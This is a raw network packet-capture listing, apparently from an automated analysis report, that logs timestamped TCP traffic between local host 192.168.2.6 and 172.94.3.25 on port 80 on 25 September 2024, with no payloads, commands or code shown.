                                        Sep 25, 2024 18:40:29.931761026 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.931777000 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.931812048 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.931852102 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.931869984 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.931901932 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.931936026 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.931946039 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.931967974 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.931999922 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.932009935 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.932033062 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.932071924 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.932085991 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.932135105 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.932168007 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.932174921 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.932200909 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.932239056 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.932250977 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.932284117 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.932316065 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.932327032 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.932349920 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.932382107 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.932391882 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.932415009 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.932449102 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.932457924 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.932482004 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.932521105 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.932538033 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.932569981 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.932602882 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.932612896 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.932652950 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.932684898 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.932692051 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.932718039 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.932750940 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.932761908 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.932846069 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.932879925 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.932885885 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.932912111 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.932945013 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.932951927 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.932976961 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.933015108 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.933028936 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.933060884 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.933094025 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.933100939 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.933125019 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.933159113 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.933167934 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.933191061 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.933223009 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.933233023 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.933259964 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.933293104 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.933303118 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.933325052 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.933357954 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.933368921 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.933391094 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.933423996 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.933433056 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.933456898 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.933490992 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.933501959 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.933522940 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.933561087 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.933573008 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.933604956 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.933638096 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.933650017 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.933670998 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.933703899 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.933707952 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.933737040 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.933773994 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.933784962 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.933818102 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.933850050 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.933856010 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.933881044 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.933917999 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.933926105 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.933948994 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.933981895 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.933986902 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.934015989 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.934047937 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.934057951 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.934079885 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.934112072 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.934117079 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.934144974 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.934178114 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.934190989 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.934209108 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.934241056 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.934253931 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.934273958 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.934305906 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.934318066 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.934338093 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.934370995 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.934380054 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.934405088 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.934442997 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.934448957 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.934475899 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.934508085 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.934520960 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.934559107 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.934591055 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.934596062 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.934623957 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.934655905 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.934667110 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.934705019 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.934745073 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.934753895 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.934787035 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.934818983 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.934829950 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.934851885 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.934885025 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.934895992 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.934916973 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.934948921 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.934959888 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.934997082 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.935025930 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.935031891 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.935067892 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.935101032 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.935106039 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.935133934 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.935165882 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.935178995 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.935198069 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.935230017 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.935241938 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.935261965 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.935292959 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.935305119 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.935326099 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.935359001 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.935369015 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.935424089 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.935460091 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.935463905 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.935492039 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.935528994 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.935542107 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.935575008 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.935607910 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.935616016 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.935642004 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.935684919 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.935691118 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.935724974 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.935765028 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.935767889 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.935798883 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.935833931 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.935837984 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.935866117 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.935899019 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.935904980 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.935930014 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.935961962 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.935975075 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.936012030 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.936044931 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.936053991 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.936077118 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.936110020 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.936115026 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.936141968 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.936175108 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.936181068 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.936208010 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.936239958 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.936273098 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.936295033 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.936305046 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.936312914 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.936337948 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.936373949 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.936382055 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.936405897 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.936438084 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.936439991 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.936490059 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.936531067 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.936541080 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.936573982 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.936613083 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.936623096 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.936655045 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.936688900 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.936696053 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.936719894 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.936753035 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.936765909 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.936784983 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.936816931 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.936826944 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.936866045 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.936897993 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.936903954 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.936929941 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.936963081 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.936974049 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.936995029 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.937026978 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.937038898 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.937062979 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.937093973 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.937099934 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.937127113 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.937158108 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.937170982 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.937191963 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.937223911 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.937236071 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.937256098 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.937289000 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.937299013 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.937321901 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.937355042 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.937380075 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.937387943 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.937429905 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.937439919 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.937473059 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.937505007 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.937510967 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.937537909 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.937571049 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.937575102 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.937621117 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.937654018 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.937658072 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.937689066 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.937721968 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.937743902 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.937752962 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.937784910 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.937797070 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.937835932 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.937869072 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.937875986 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.937901020 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.937932968 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.937937975 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.937964916 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.937997103 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.938004017 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.938030005 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.938061953 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.938075066 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.938095093 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.938127995 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.938137054 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.938160896 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.938198090 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.938209057 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.938230038 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.938271999 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.938280106 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.938306093 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.938343048 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.938349009 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.938376904 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.938420057 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.938427925 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.938462019 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.938505888 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.938513041 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.938545942 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.938581944 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.938594103 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.938613892 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.938648939 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.938657999 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.938680887 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.938714027 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.938725948 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.938746929 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.938780069 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.938786983 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.938813925 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.938851118 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.132154942 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.138408899 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.138434887 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.138448954 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.138459921 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.138472080 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.138484001 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.138494968 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.138506889 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.138515949 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.138575077 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.138597012 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.138612986 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.138624907 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.138636112 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.138648033 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.138659954 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.138662100 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.138672113 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.138684034 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.138691902 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.138712883 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.138763905 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.138777018 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.138796091 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.138808966 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.138811111 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.138854980 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.138881922 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.138894081 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.138906002 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.138916969 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.138919115 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.138931036 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.138948917 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.139133930 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.139143944 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.139154911 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.139168024 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.139174938 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:30.139179945 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:30.139192104 CEST8049716172.94.3.25192.168.2.6
